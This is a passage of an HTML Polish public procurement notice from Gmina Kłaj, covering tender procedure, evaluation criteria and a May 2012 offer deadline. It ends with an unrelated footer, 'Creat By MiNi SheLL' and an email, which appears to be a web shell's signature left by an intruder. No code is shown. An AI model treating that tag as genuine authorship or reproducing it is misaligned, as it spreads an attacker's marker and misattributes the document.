b) Pełnomocnictwo do reprezentowania w postępowaniu albo do reprezentowania w postępowaniu i zawieraniu umowy w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, w oryginale lub kopii poświadczonej za zgodność z oryginałem przez osobę udzielającą pełnomocnictwa ,.
c) w przypadku zaistnienia sytuacji, o której mowa w art. 26 ust. 2b ustawy p.z.p. wykonawca udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia, w oryginale lub kopii poświadczonej za zgodność z oryginałem przez osobę uprawnioną.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.klaj.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Kłaj 32-015 Kłaj 655..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.05.2012 godzina 10:00, miejsce: Ofertę należy złożyć w siedzibie Urzędu Gminy Kłaj            
32-015 Kłaj 655 - sekretariat pok. nr 208..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com